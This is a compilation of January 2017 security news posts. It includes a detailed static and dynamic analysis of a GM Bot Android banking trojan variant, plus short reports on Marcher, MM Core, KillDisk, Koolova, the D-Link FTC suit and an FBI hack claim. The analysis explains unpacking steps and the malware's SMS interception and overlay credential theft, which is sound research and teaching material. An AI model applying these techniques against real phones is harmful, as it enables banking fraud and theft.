“Since early 2014, Russian intelligence has researched US electoral processes and related technology and equipment. DHS assesses that the types of systems we observed Russian actors targeting or compromising are not involved in vote tallying,” continues the report.

The report also highlights the use of the RT America TV, a Russia-financed channel operated from within the United States, as a messaging tool to undermine faith in the US Government and fuel political protest.

The report confirmed that hackers belonging to the Russian GRU were behind the leak of data exfiltrated from the World Anti-Doping Agency (WADA) database.

Of course, Russia denied claims it interfered with the US Presidential Election.

Analyzing a variant of the GM Bot Android malware
7.1.2017 securityaffairs Android

My friends at CyberBlog decided to analyze the GM Bot Android Malware as exercise aiming to receive feedback sand suggestions from the security community.
The sample explored is confirmed as a variant of the GM Bot Android malware – who’s source was released publicly in early 2016. The code appears to have been forked by a second author and has additions that target the Danske Bank MobilePay application and the popular Danish Nem ID two factor authentication (2FA) system.

This article shows the process of walking through Static and Dynamic analysis to unlock the packed source code for the malware.

We see how even with basic static analysis a full picture of the intent of the malware can be readily assembled, and with a little debugging we can quickly get to readable source code.

As part of my journey into Cyber Security I thought it would be interesting to see how modern mobile malware operates. I chose the following sample at random based on an article here.

File Details
SHA256: 44ed4bbd5cdc13c28992c16e99a7dc58f5f95463e889dd494a433549754f7863
MD5: da88bdcb3d53d3ce7ab9f81d15be8497
A quick google search for these hashes will lead you to the file used if you would also like to explore this sample.

The article above demonstrates that the analyst has gone from sample to source code, but it is not clear how this is achieved. There are references to suggest that the code has been packed, but again no information on how it was unpacked for analysis.

This post will break down the process I used to analyse this sample, hopefully with enough detail to provide some tips and guidance for others wishing to attempt similar. The process I followed can be logically broken into the following stages:

Analysis Process
Public Analysis – What can we find out using existing public sources of information? What analysis has already been performed (automated or manual)?
Static Analysis – What can we determine from the sample without actually running it in an emulated environment?
Packer Debugging – Assuming the sample is packed (to frustrate analysis), how do we debug the unpacker to understand what is being loaded /run?
DEX Extraction and De-compilation – Once we have mapped out the function of the unpacker, how do we then recover the main code for the malware and reverse it?
Functional & Dynamic Analysis – once we have the extracted and reversed code, what do we see and how does this correlate with behavior in a safe emulated environment
Stage 1 – Public Analysis
First off let’s see what we can find about this in the public domain. Searching for the file hashes on Virus Total, where we see approximately 50% of AV products have identified it as malicious:

VirusTotal Results
However, we also note that all classify it heuristically as a generic strain of malware – either a Trojan, Dropper, Fake Installer etc. Nothing to suggest it is in fact GM Bot Android, or any specific type of malware. Other than this we don’t see much from google with either the SHA256, or MD5 hashes.

The original Security Intelligence article references IBM X-Force research, so this is the next stop – but again nothing immediately obvious with regards to this sample could be located.

A wider search of the internet reveals some history of GM bot, originally built and sold by Ganga Man on dark web forums. Following a dispute the source code for both client APK and C2 server were released publicly. A copy is hosted here on Github and will provide useful for cross referencing with this sample later in the analysis.


Stage 2 – Static Analysis
First up we are going to unpack the APK file using APK tool. This will unzip the contents, as well as providing a disassembly of the DEX code into Smali:

apktool d da88bdcb3d53d3ce7ab9f81d15be8497.apk
The results of this can be seen below and the tool has also provided a human readable version of the AndroidManifest.xml file.

Extracted APK files
First stop is to take a look at the Android Manifest file, that should provide an overview of the components of the application and permissions requested.

Manifest Analysis – AndroidManifest.xml
Android Manifest
Initial analysis shows a broad range of permissions that indicate malicious behavior including permissions to:

control all SMS messages (send, receive, read, write, delete)
list running applications
read the phone’s state, contacts, SD card data
request to be a device administrator enabling remote wiping of the device with no warning to the user
A summarized view of referenced class files for the main application, activities (15) and services (2) can be seen below:

Classes Declared in Manifest -Application, Activities and Services
In addition, we see 4 further classes mapped as Broadcast Receivers which will process event messages (Android system Intents) as shown below:

Broadcast Receiver Classes Declared in Manifest
From this we can see the application is capable of:

Executing code when the phone is powered on (starting the application automatically)
Receive notification when Device Admin is granted, requested or a request to disable admin is received (and hence interfere, or nag the user to enable it)
Receive notification of a new inbound SMS – with high priority flag to ensure the code can intercept it first and potentially stop any further alerts (can be used to steal 2FA tokens)
Before proceeding with any reverse engineering of the code, the next step is to explore the other files in the APK for clues.

Files of interest
The following files were noted as of interest:

File: assets/fytluah.dat
A binary file with no immediately obvious format. Possible code to be unencrypted / unpacked at run time?

File: res/values/strings.xml
English language strings for the application, as shown below:

File: res/values/strings.xml (English Language Resource File)
The strings clearly indicate that this malware is targeting capturing victims credit card information. It is interesting to note that:

The resource keys here are all in English, suggesting the original developer may be English speaking
There are specific strings that are in Danish, despite this resource file being intended for English language
In addition to English language strings we also see several other targeted countries:
Other Resource Files
File: res/values.xml
This file contains a list of country codes and specifically a group that are “non vbv”. This is understood to mean that they do not use the “Verified by Visa” process which is used to enforce additional verification checks during online purchases. It is likely that the attackers would seek to obtain additional VBV credentials via the malware in order to allow online purchases with the card details (or avoid these countries).

Verified By Visa Targeted Countries
Directory: res/drawable
Images and icons/logos including:

Sample photo of Danish “Nem Id” – https://en.wikipedia.org/wiki/NemID
Icon for Danske Bank mobile pay
Mastercard secure code
Icon for verified by visa
Google play
Flash icon (main application icon)
Additionally there are png images prefixed “overlay_”, indicating a possible use in fraudulent overlay activity.

Decompiling to Java source code
Next we attempt to reverse engineer the DEX file back to original Java source code. For this we use dex2jar as follows to translate the DEX file (in the APK) into a Java Class file archive:

Dex2jar da88bdcb3d53d3ce7ab9f81d15be8497.apk
The resulting jar file can then be disassembled using JD-GUI as follows:

java -jar ../../jd-gui-1.4.0.jar da88bdcb3d53d3ce7ab9f81d15be8497_dex2jar.jar
The resulting java classes that we see in JD-GUI show that there are only 4 java classes contained in the application. This is in direct contrast to the 16 different classes we saw declared in the application manifest. This confirms that there must be additional code that is loaded dynamically at run time – it is most likely that these four classes are in fact an unpacker.

Unpacker Classes
Examining the code we see that it is heavily obfuscated and has been crafted in a way to prevent clean decompiling of the code. This aside, we can start to get an understanding of the function of these four classes by examining the system classes that are imported (and therefore used) when the application is first executed.

After exporting the java source from JD-GUI and unzipping to a new folder, we can extract the imported classes from these files:

find . -type f -exec grep "^import" {} \; | sort -u
The classes we find are shown below :

Class Imported Class
com.igcfse.enscbo.a com.igcfse.enscbo.b
com.igcfse.enscbo.a java.io.RandomAccessFile
com.igcfse.enscbo.a java.lang.reflect.Constructor
com.igcfse.enscbo.b android.app.Application
com.igcfse.enscbo.b android.content.Context
com.igcfse.enscbo.b com.igcfse.enscbo.a
com.igcfse.enscbo.b java.io.File
com.igcfse.enscbo.b java.lang.reflect.Field
com.igcfse.enscbo.b java.lang.reflect.Method
com.igcfse.enscbo.c android.content.Context
com.igcfse.enscbo.c com.igcfse.enscbo.b
com.igcfse.enscbo.c java.io.FileDescriptor
com.igcfse.enscbo.c java.io.IOException
com.igcfse.enscbo.c java.lang.reflect.Constructor
com.igcfse.enscbo.c java.util.Random
com.igcfse.enscbo.wieroel android.app.Application
com.igcfse.enscbo.wieroel android.content.Context
com.igcfse.enscbo.wieroel com.igcfse.enscbo.b
Essentially we have a very small set of libraries that are being imported and used. These consist of functionality for:

General Android application and context classes (expected and needed for all android apps)
File related classes (in red) – for access, reading and writing local files
Java reflection classes (in green) – for creating new classes and instances and invoking methods dynamically
This confirms the hypothesis that we are most likely dealing with an unpacker that unpacks it’s executable code from a local file resource (as opposed to pulling dynamically from network for example).

Stage 3 – Unpacker Debugging
As the Java code cannot be readily decompiled (due to protections injected by the malware author) we will instead debug the executable against the Smali assembly code. Smali is a disassembly of the DEX code used by the Dalvik Virtual Machine.

The Smali/Baksmali plugin for Android Studio is required, and then the output from Apktool is imported as a new project. We next set the breakpoints as required across the three classes that we are interested in (a,b,c):

Setting Breakpoints in Android Studio
We will initially debug the calls to interesting reflection methods identified, which are as below:

a.smali (a line that creates a new instance of a class based on a java.lang.reflect.Constructor instance)


b.smali (a line that invokes a method on an object via reflection)


c.smali (a line similar to that described above for a.smali)


Now we install the application to the emulator (via ADB to ensure it doesn’t start automatically as in some emulators).

To enable the debugger to connect to the application, we perform the following prior to starting the application:

Enable developer options by repeatedly clicking the build number in Settings > About device
In developer options, choose “Select debug app” and choose the malicious application – “Adobe Flash”
In developer options, enable the “wait for debugger”
Selecting Debug Application
Now start the application from the launcher, you will be prompted to attach the debugger:

Attaching Debugger
In Android Studio, attach the debugger using the icon. Choose the malicious application process. The debugger then stops at our first breakpoint as shown below:

First Breakpoint Reached
Note you should now set some variables to watch – as per above I have set v0 through v10 and p1 through p3. Our first breakpoint is hit and we see we are about to execute a method by reflection. Noting that we have not yet called newInstance() we can assume this is calling existing (loaded) classes – either one of the four loaded by the application, or some other Android framework classes.

Next we forces step into the method to see which method it is calling (the smali debugger seems a little buggy and we can’t at this point see the parameters being passed).

Stepping into Reflected Method Call
An initial call to get the current context object -presumably to start retrieving local resources from the APK. We now allow the debugger to continue, and repeat this exercise several times to build up a flow of the reflected method calls:

Context android.context.ContextWrapper.getBaseContext()

//expected 2 arguments, got 1 – error in malware code, or to throw off debugging?
//Several more of these not shown
IllegalArgumentException java.lang.IllegalArgumentException(String s)

void Java.lang.reflect.setAccessible(boolean flag)

File android.app.getDataDir()

// returns /data/user/0/com.kzcaxog.mgmxluwswb/app_ydtjq

ContextImpl android.app.getImpl(Context context)

//filename is fytluah.dat
InputStream android.content.res.AssetManager.open(String fileName)
Pausing here, we can see the code is attempting to load the file that we had previously flagged as of interest in the static analysis section. Continuing we see the file is read, presumably decrypted and then written out again as a jar file:

int android.content.res.AssetManager.read(byte[] b)

//className = java.io.File
Class java.lang.Class.forName(String className)

//args = String “/data/user/0/com.kzcaxog.mgmxluwswb/app_ydtjq/gpyjzmose.jar”
T Java.lang.reflect.Constructor.newInstance(Object.. args)

void java.io.FileOutputStream.write(byte[] b) #25

void java.io.FileOutputStream.close()
Finally a DexClassLoader is invoked to load the additional code into the system:

ClassLoader java.lang.Class.getClassLoader()

//className is dalvik.system.DexClassLoader
java.lang.Class.forName(String className)
Looking at the API for the DexClassLoader we can see that it takes two arguments – the location of the file to load, and a writeable area that it will use to re-write an optimised version of the code for the specific machine architecture – eg the Android Run Time (ART). Further information on this can be seen in the Android API documentation:


Stage 4 – DEX Extraction and Decompiling
We can see the exact location of the jar file in the debugger below, and the next step is to recover this file via ADB command line.

Debugging the Call to the DEXClassLoader
After execution of the classloader, connecting via ADB shell we see the two files, the original and the DEX optimised code:

Extracting the Payload Code
We copy these files to /sdcard/Download (+chmod) and then pull the .jar file to local machine for further analysis with adb pull.

Examining the files
Extracting the jar file we find the classes.dex file.

Repeating the steps to convert this to a jar file using dex2jar and decompiling with JD-GUI, we confirm we now have the full (un-obfuscated) source code for this malware sample.

Decompiled Source Code
Stage 5 – Dynamic and Functional Analysis
First Installation
Upon initial analysis we can see the codebase bear remarkable similarities with the leaked source identified in the static analysis. However there are significant differences, and the code has been customised to specifically target the Danske Bank MobilePay application.

As the code is basically un-obfuscated, I’ll now briefly walk through the key functionality of this malware, starting from first installation.

First Installation Process Overview
Upon first installation and execution the application will perform two primary functions. It will initially harvest a range of the users data, including phone contacts, all SMS messages and other key data and send this to the C&C server. The C&C server then returns a unique installation identifier that is then used for all future communication to uniquely identify the compromised device.

Secondly the malware will then nag the user to accept the software as a device administrator. If the user declines the request is re-triggered, making it very difficult for most users to escape this screen without accepting. With this permission in place, the malware achieves two objectives:

The application cannot be un-installed by the user easily, without de-activating the device administrator. Attempting to do this will trigger the launching of overlays that prevent removing the device admin
At some point in the future, once further data has been stolen from the phone, the C2 server can issue a command to wipe the device, removing evidence of the infection and restoring the device to a factory state
Ongoing Operations – including after each reboot
Command and Control Process Flows
The malware maintains a regular heartbeat to the C2 server, which provides a mechanism for the attacker to issue specific commands to the device. Each hearbeat contains the installation ID and the current screen status. It is hypothesised that the attacker would ideally choose to execute malicious activities when the screen was off, and the user was not watching the phone.

Firstly we see the ability to “lock” and “unlock” the phone. This simulates an Android software update screen, and effectively hides any other activity that is occurring behind the screen overlay (such as sending, receiving or deleting SMS messages). Additionally this could be used to disable the user, and prevent them from using the phone whilst their accounts or cards are being compromised in real time.

Next we see another function that is intended to intercept and forward SMS messages to the C2 server, and specifically trying to remove evidence that they ever existed by deleting them. This is used to steal 2FA credentials.

Next from a C2 server perspective we see two “reset” commands. The first, a “soft” reset, is used to reset the internal flag to re-attempt stealing Nem ID credentials. The second is the “hard” reset that performs and immediate wipe of the device data.

Finally, we see the ability to send an arbitrary SMS message to a mobile defined by the attacker and a function to launch a customised push notification to another application on the device. It was not clear what this could be used for.

SMS Remote Control
SMS Remote Control – “Admining Mode”
By listening for incoming SMS messages the malware could also trigger a fake Android update screen that would then harvest, forward and attempt to delete messages as they arrived on the phone. This mode could be enabled and disabled by customised SMS command messages delivered to the phone via SMS.

Automating Data Theft
Decompiled Code Showing Targeted Applications
As per the original article and many of the indicators from the static analysis, the primary purpose of the application is to steal data by performing overlays on top of legitimate applications. The malware targets three specific classes of applications:

Danske Bank’s MobilePay application, with specific intent to steal Nem ID credentials
Applications that trigger an attempt to steal credit card details via a custom overlay
Applications that trigger an attempt to steal the users mobile phone number (possibly for triggering the “admining” mode described above)
Danske Bank MobilePay
Danske Bank MobilePay Overlay Process
Upon launching the MobilePay application the overlay attempts to steal the users CPR number (unique social security type id), mobile number and Nem pass code. It then asks the user to take a photo of their Nem ID passbook, containing one time use codes which can be used by the attacker to then log into MobilePay (and other Danish systems) and issue payments.

Stealing Credit Card Details
Credit Card Overlay Process
Upon launching one of the targeted applications, a credit card overlay is displayed with a configurable icon depending on the application launched. After basic card details are collected, the application then attempts to recover the Verified by Visa password for the user. These details are then forwarded to the C2 server.

Stealing Phone Numbers
Phone Number Overlay Process
Finally we see the functionality that is targeted to capture the user’s phone number, presumably to enable further abuse of the victims account via abuse of text message 2FA.

The sample appears to be a specifically customised variant that is being used in a campaign to target the Danske Bank MobilePay application. We see evidence that it is probably not the original GM Bot authors work – the coding style compared with the public source code is different, and the mix of languages in the resource files implies the sample has been adapted in a “quick and dirty” fashion to achieve the objectives.

This is a good example of how once released, complex code can be quickly and easily forked by less skilled authors and a pattern we also see today with the release of the Mirai botnet code. Quickly we see a spread of variants of the codebase that become harder to trace and detect and importantly attribute to any individual or group.

As ever, the best advice to prevent becoming a victim of such malware is to ensure that your phone is not configured to install 3rd party applications, and always review requests for permissions carefully – eg, are they aligned with the expected purpose of the application?

Open Questions
Due to time constraints there are a few further areas I would have liked to explore. I may pick these up in a subsequent post, but for the record they are:

The unpacked code contains included super user functionality from Chainfire’s SuperSu application. It’s not clear how or where this is used, no apparent attempt at rooting the device was seen in the unpacked code.
The debugger failed to return from the call to unpack the payload code. It is not clear if any further reflected actions were performed beyond this.
Given key indicators in the codebase, is it possible to search / locate other similar samples, or perhaps identify further C2 infrastructure
Any constructive feedback or comments most welcome.

About the author, the owner of the CyberBlog

I am an experienced IT consultant with a broad range of experience across different disciplines from development to large-scale Project Management. I have a passion for all things Cyber related but do not currently work in a Cyber related industry or role. I welcome and encourage all feedback!

FTC Sues D-Link Over Failure to Secure Its Routers and IP Cameras from Hackers
6.1.2017 thehackernews

Image Source: Book - Protect Your Windows Network from Perimeter to Data
The United States' trade watchdog has sued Taiwan-based D-link, alleging that the lax security left its products vulnerable to hackers.
The Federal Trade Commission (FTC) filed a lawsuit (pdf) against D-Link on Thursday, arguing that the company failed to implement necessary security protection in its routers and Internet-connected security cameras that left "thousands of consumers at risk" to hacking attacks.
The move comes as cyber criminals have been hijacking poorly secured internet-connected devices to launch massive DDoS attacks that can force major websites offline.
Over two months back, a nasty IoT botnet, known as Mirai, been found infecting routers, webcams, and DVRs built with weak default passwords and then using them to DDoS major internet services.

The popular Dyn DNS provider was one of the victims of Mirai-based attack that knocked down the whole internet for many users.
To combat this issue, on the one hand, the popular networking equipment provider Netgear has launched a bug bounty program, inviting researchers and hackers to find and responsibly report security flaws in its hardware, mobile apps, and APIs for cash rewards ranging from $150 to $15,000.
But on the other hand, D-Link has been accused of several FTC Act violations, including:
Falsification about security in its router and IP camera user interfaces and promotional materials.
Falsely claiming that reasonable measures have been taken to protect its devices against well-known and easily preventable security flaws, like "hard-coded" user credentials and command injection flaws, which would allow any remote attacker to gain unauthorized access to its devices.
Failure to secure its software.
According to the complaint filed in San Francisco federal court, D-Link's insecure products allowed hackers to "monitor a consumer’s whereabouts to target them for theft or other crimes."

Several security researchers and hackers found serious flaws in D-Link products over the past year, and while some were satisfied with the company addressing the issue, others disclosed unpatched flaws due to its failure to release firmware updates in time.
In response to the complaint, D-Link released a statement saying that the charges brought against it are "unwarranted and baseless" and that the company will "vigorously defend itself."
The FTC "fails to allege, as it must, that actual consumers suffered or are likely to suffer actual substantial injuries," D-Link added.
Due to rise in the IoT threat, the Commission is taking desired steps to protect the Internet-of-Things devices.
The FTC introduced guidelines back in 2015 to (or "intending to") securing IoT devices, and recently it also launched a "prize competition" for public with the aim to find some technical solution for securing IoT devices. The winner of the contest will get $25,000 prize money.

Netgear launches Bug Bounty Program for Hacker; Offering up to $15,000 in Rewards
6.1.2017 thehackernews Hacking
It might be the easiest bug bounty program ever.
Netgear launched on Thursday a bug bounty program to offer up to $15,000 in rewards to hackers who will find security flaws in its products.
Since criminals have taken aim at a rapidly growing threat surface created by millions of new Internet of things (IoT) devices, it has become crucial to protect routers that contain the keys to the kingdom that connects the outside world to the IP networks that run these connected devices.

To combat this issue, Netgear, one of the biggest networking equipment providers in the world, has launched a bug bounty program focusing on its products, particularly routers, wireless security cameras and mesh Wi-Fi systems.
Bug bounty programs are cash rewards given by companies or organizations to white hat hackers and researchers who hunt for serious security vulnerabilities in their website or products and then responsibly disclose for the patch release.
Also Read: How Hackers Hack Bank Accounts with Router Vulnerabilities
Bug bounties are designed to encourage security researchers, hackers and enthusiasts to responsibly report the vulnerabilities they discovered, rather than selling or exploiting it.
On Thursday, Netgear announced that the company has partnered up with Bugcrowd to launch Netgear Responsible Disclosure Program that can earn researchers cash rewards ranging from $150 to $15,000 for finding and responsibly reporting security vulnerabilities in its hardware, APIs, and the mobile apps.
Meanwhile, on the same day, The Federal Trade Commission (FTC) filed a lawsuit against D-Link, another large networking equipment providers, arguing that the company failed to implement necessary security protection in its routers and Internet-connected security cameras that left "thousands of consumers at risk" to hacking attacks.

If you are a bug bounty hunter, you should read all terms and conditions before shooting your exploits against Netgear products or website.
One of them explicitly mentioned, "You may only exploit, investigate, or target security bugs against your own accounts and/or your own devices. Testing must not violate any law, or disrupt or compromise any data or access data that is not yours; intentional access of customer data other than your own is prohibited."
The company is paying out up to $15,000 for each vulnerability. The highest bounty will be given for the flaws that would allow access to the cloud storage video files or live video feeds of all its customers, and bugs that allow remote access to routers from the Internet, as shown in the chart above.

However, the Netgear will also pay $10,000 for video feed and cloud storage access bugs that cannot be exploited in mass attacks. The same payout will also be given for security issues that provide access to the payment card data of all Netgear customers.
Also Read: Someone Just Hacked 10,000 Routers to Make them More Secure.
Others vulnerabilities that qualify the bounty program include:
SQL injection bug
Information disclosure flaw
Stored cross-site scripting (XSS) vulnerability
Cross-site request forgery (CSRF) bug
Open redirect issues
Here's the Bingo! Bug bounty hunters will be rewarded with a triple prize if they will successfully exploit at least three flaws in a chain.
So, what are you waiting for? Go and Grab 'em all!

A fake Super Mario Run for Android is serving the Marcher Banking Trojan
6.1.2017 securityaffairs Android

Zscaler experts have found in the wild a fake version of the Super Mario Run Android App that could install the Android Marcher banking trojan.
Bad news for mobile gamers, security experts at Zscaler have spotted a strain of the Android Marcher Trojan masqueraded as the recently released Super Mario Run mobile game for Apple’s iOS.

Marcher is a sophisticated banking trojan that was used by cyber criminals to steal financial data from the victims.

“Marcher is a sophisticated banking malware strain that targets a wide variety of banking and financial apps and credit cards by presenting fake overlay pages. Once the user’s mobile device has been infected, the malware waits for victims to open one of its targeted apps and then presents the fake overlay page asking for banking details.” states the analysis published by Zscaler.

Super Mario Run mobile game for iOS device is one of the most interesting projects of the Nintendo, the company developed for Apple devices the notorious game. Anyway, Super Mario Run is still not available for Android, and crooks are taking advantage of this to spread their malicious variant.

The malicious code found by Zscaler installs the Marcher Trojan instead a legitimate version of Super Mario Run for Android.

“In this new strain, the Marcher malware is disguised as the Super Mario Run app for Android. Knowing that Android users are eagerly awaiting this game, the malware will attempt to present a fake web page promoting its release.” continues the blog post published by Zscaler.

The experts also shared the following details related to the threat:

Name : Super Mario Run
Package Name : uiq.pizfbwzbvxmtkmtbhnijdsrhdixqwd
MD5 : d332560f1fc3e6dc58d94d6fa0dab748
Detections : 12/55(at time of analysis)
When victims try to install the app it asks for multiple permissions including administrative rights.

Super Mario Run

The current Marcher version targets account management apps and major banks.
The researchers explained that also this Marcher variant presents fake credit card pages when the victims open the Google Play store. The trojan locks out Google Play until the victims supply the credit card information.

Researchers suspect the malware is still under development, they observed the banking overlay pages served by the C&C were not functioning properly at the time of the analysis.

“In the current variant, we have observed a new obfuscation technique, in which all important string characters are delimited with ‘<<zB5>>‘ as shown below.” continues the analysis.

Crooks always try to take advantage of gamers’ euphoria that coincides with the presentation of new games.

The same has happened last year when the Pokemon GO application was presented. Experts from ProofPoint spotted in the wild a backdoored version of the popular Pokemon GO Android App that could allow attackers to gain control over victims’ devices.

MM Core APT malware is back, Forcepoint has detected 2 new versions
6.1.2017 securityaffairs

Forcepoint has detected two new versions of an advanced persistent threat (APT) malware dubbed MM Core APT and first discovered in 2013.
The APT MM Core malware has been in the wild since April 2013 when it was spotted for the first time by experts at FireEye.

The malware researchers dubbed the first release of the malware “TROJAN.APT.BANECHANT” (2.0-LNK), it is mainly a backdoor used by threat actors to steal information from the victims. The malware was used to target the governments of Middle East and Central Asia.

BaneChant detects multiple mouse clicks before starting its activity, this behavior was implemented in the attempt to evade sandboxes.

BaneChant callback also goes to a legitimate URL, the malware reaches a legitimate URL shortening service that then redirects the communication to the CnC server. In this way, the authors prevent security solutions from blacklisting the command and control (C&C) servers.

The malware requires an Internet connection for malicious code to be downloaded directly into the memory and executed.

A new version of the MM Core malware dubbed “StrangeLove, tracked as “2.1-LNK,” was discovered in June 2013 by researchers at Context Information Security. The news version was characterized by some modifications in the downloader component. Threat actors used StrangeLove to target entities in the Middle East.

Back to the present, experts from Forcepoint have detected two new versions of the MM Core malware dubbed BigBoss (2.2-LNK) and SillyGoose (2.3-LNK).

“Attacks using “BigBoss” appear likely to have occurred since mid-2015, whereas “SillyGoose” appears to have been distributed since September 2016. Both versions still appear to be active.” reads the reports published by Forcepoint.

MM core sillygoose_strings.png

The new variants infected users in the US and Africa, the experts observed that victims belong to multiple industries such as news and media, defense, oil and gas, and telecommunication.

Below the main functionalities implemented in the MM Core backdoor:

Send infected system’s computer name, windows version, system time, running processes, TCP/IP configuration, and top level directory listings for drives C to H
Download and execute file
Download and execute file in memory
Update itself
Uninstall itself
A novelty introduced in the last variant of the backdoor is that the downloader component leverages on the vulnerability the Microsoft Office Memory Corruption Vulnerability(CVE-2015-1641) to extract embedded malware.

In order to make harder the tracking of the C&C infrastructure, the threat actors are using WHOIS privacy protection services for their new C&C domains.

Crooks also signed the code of the downloader components with a valid authenticode certificate from Russian organisation “Bor Port,” the threat actors behind the APT malware likely has stolen it.

Forcepoint pointed out that while the number of MM Core samples is low, it has noticed that the Trojan’s downloader shares code, techniques and infrastructure with Gratem, a more active downloader that has been around since at least 2014. Recent samples have also been found to share the same certificates.

Experts believe the MM Core APT malware is just a part of a larger cyber espionage operation on which they are still investigating. They linked the malware to another trojan dubbed Gratem:

“On the other hand, while the volume of related MM Core samples remain low, we noticed that the MM Core downloader shares code, techniques and network infrastructure with a trojan called which has been distributed since at least 2014.” states the report.

“Gratem”, as well as sharing the same authenticode certificate for recent samples. Gratem is a more active downloader malware family which has been distributed since at least 2014. Ultimately this suggests that MM Core may be a part of a larger operation that is yet to be fully uncovered.

Give a look at the report for further details, including the Indicators ofCompromise (IoCs)

KillDisk Ransomware Targets Linux; Demands $250,000 Ransom, But Won't Decrypt Files
6.1.2017 thehackernews

What you'll do if Ransomware infects you? Should you pay or not to recover your files?
Believe me, the FBI advises - Pay off the criminals to get your files back if you don't have a backup.
But paying off a ransom to cyber criminals is definitely not a wise option because there is no guarantee that you'll get the decryption key in return.
In the latest incident, the new variant of KillDisk ransomware has been found encrypting Linux machines, making them unbootable with data permanently lost.

What is KillDisk? KillDisk is a destructive data wiping malware that has previously been used to sabotage companies by randomly deleting files from the computers.
KillDisk is the same component associated with the Black Energy malware that was used to hit several Ukrainian power stations in 2015, cutting power for thousands of people.
But according to ESET security researchers, the nasty KillDisk disk wiper malware is back with new variants that target Windows and Linux desktops and servers, encrypt files and then ask for an unusually large ransom:
Around $218,000 in Bitcoins – possibly the world's most expensive ransom attacks.
What's even worst? Linux variant of the KillDisk ransomware does not store the encryption key anywhere on disk or command-and-control server.
So, even after you pay this extremely large ransom, you are not going to get any decryption key for recovery of your important files.

The good news is that ESET researchers have found a weakness in the encryption employed by the Linux variant which makes recovery of encrypted files possible, though difficult. But the same flaw doesn't exist in the Windows variant of the KillDisk ransomware.
KillDisk Deletes your Files Even After Paying $218,000
According to researchers, the files of victims targeted with the Linux variant of the malware are encrypted using "Triple-DES applied to 4096-byte file blocks," and each file on the computer is encrypted by a different set of 64-bit encryption keys.
The malware then displays the ransom note in an unusual manner: within the GRUB bootloader, which means the KillDisk Linux ransomware overwrites the bootloader entries to show ransom text that asks victims to pay 222 Bitcoin.
But paying off the criminals ransom will not bring your files back, as the Linux variant does not store decryption keys anywhere.
"KillDisk serves as another example of why paying ransom should not be considered an option. When dealing with criminals, there's no guarantee of getting your data back – in this case, the criminals clearly never intended to deliver on their promises," says Robert Lipovský, ESET Senior Researcher.
Prevention is the Best Practice
So, the only safe way of dealing with ransomware is prevention. As I previously recommended, the best defense against Ransomware is to create awareness within the organizations, as well as maintaining back-ups that are rotated regularly.
Most viruses are introduced by opening infected attachments or clicking on links to malware usually in spam emails. So, DO NOT CLICK on links provided in emails and attachments from unknown sources.
Moreover, ensure that your systems are running the latest version of Antivirus software with up to date malware definitions.

FBI Hacked, Again! Hacker Leaks Data After Agency Failed to Patch Its Site
5.1.2017 thehackernews Hacking

It seems like the FBI has been hacked, once again!
A hacker, using Twitter handle CyberZeist, has claimed to have hacked the FBI's website (fbi.gov) and leaked personal account information of several FBI agents publically.
CyberZeist had initially exposed the flaw on 22 December, giving the FBI time to patch the vulnerability in its website's code before making the data public.
The hacker exploited a zero-day vulnerability in the Plone CMS, an Open Source Content Management software used by FBI to host its website, and leaked personal data of 155 FBI officials to Pastebin, including their names, passwords, and email accounts.
CyberZeist tweeted multiple screenshots as proof of his claims, showing his unauthorized access to server and database files using a zero-day local file inclusion type vulnerability affecting its python plugins.
Hacker also found that the FBI's website is hosted on a virtual machine running a customized older version of the open-source FreeBSD operating system.

According to another tweet, the Plone CMS zero-day exploit is up for sale on an unnamed dark web marketplace.
The Plone CMS is considered to be one of the most secure CMSes available today and is used by many major websites like Google, and major United States agencies including the FBI and the CIA.
CyberZeist also warned other agencies, including the European Union Agency for Network and Information Security, Intellectual Property Rights Coordination Center, and Amnesty International, which are currently using the Plone CMS that they too are vulnerable to a similar attack.
The FBI authorities have yet to respond to the claims.
Update — Official Statement from Plone Security Team:
Meanwhile, Plone Security team has released a security advisory saying that it will release a security update on 17th January to its customers to "patch various vulnerabilities."
For now Advisory doesn't include much technical information about the vulnerabilities, but all supported Plone versions (4.x, 5.x). Previous versions could be affected.
"The advisory information we give in those pre-announcements is standard. In fact, the upcoming patch is to fix a minor issue with Zope which is neither a RCE or LFI inclusion problem."
Notably, Plone Security team has also mentioned that "there is no evidence that the issues fixed here are being actively exploited."
"The issue we are fixing in no way resembles CyberZeist's claims, neither do the issues we fixed last month." Matthew Wilkes, Plone security team, told The Hacker News.
"The aim of releasing information from such a hack is to convince people that you've indeed hacked the target. Claims of hacks that only give information that is publicly available (such as open-source code) or impossible to verify (such as hashed passwords) are common signs of a hoax," Matthew said.
“It is extremely easy to fake a hack like this; it takes rudimentary Photoshop skills or use of Chrome javascript developer console.“ - Nathan van Gheem, Plone security team, told THN.
Also, Mr. Alexandru Ghica, Eau de Web, the maintainer of an EU website which hacker also claimed to have hacked says, "I can say for sure that at least some of the data posted as proof is 100% fake. The hoax was a bit elaborate indeed, but that's it."
This is not the first time CyberZeist claimed to have hacked the FBI website. In 2011, the hacker breached the FBI website as a member of the infamous hacker collective known as "Anonymous.

This Ransomware Unlocks Your Files For Free If You Read CyberSecurity Articles
5.1.2017 thehackernews
Ransomware has been around for a few years, but in last two years, it has become one of the fastest growing threats to businesses and users across the world, so will be in 2017.
Ransomware is a piece of malware that encrypts files on your computer with strong encryption algorithms and then demands a ransom money in Bitcoin to decrypt the data so you can regain access to your encrypted files.
We have seen some nastier ransomware infections over the past couple of years. The most interesting one was Popcorn Time that decrypts victims files for free if they pass the infection on to other people.
Now, a new strain of ransomware takes the infection to a whole new level of craziness.
Dubbed Koolova, the ransomware will restore your encrypted files for free, just like Popcorn Time. The only difference between both the infections is that you don't have to infect others to get free decryption key.
Instead, all you have to do is educate yourself about ransomware by reading two cyber security awareness articles about avoiding the infection.

Discovered by security researcher Michael Gillespie and reported by BleepingComputer, the Koolova ransomware is not professionally coded and appears to be a work in progress.
The ransomware requires a lot of technical knowledge to get to the ransom demand screen that asks victims what they need do in order to avoid erasure of their data.
Once infected, Koolova encrypts the victim's files and then displays a warning screen where the text tells the victim to open and read two articles before they can get the ransomware decryption key.
If the victim is too lazy to read both articles, Koolova starts a countdown that if gets to zero, the ransomware will delete the encrypted files like Jigsaw malware.
But once the victim reads both articles, the Decrypt My Files (Decripta i Miei File) button becomes available. On clicking this button, Koolova will connect to the Command-and-Control (C&C) server and retrieve the decryption key.
The victim will then be able to take that decryption key and enter it into the key field to decrypt files.
Although the motive behind the ransomware attack is not to harm people, these kinds of actions are considered to be illegal in many countries. On January 1, a new law went into effect in California that outlaws the use of ransomware.
Do you consider educating people about any threat like this a good practice? Hit the comments below.

FireCrypt comes as a malware building kit and includes DDoS code
5.1.2017 securityaffairs

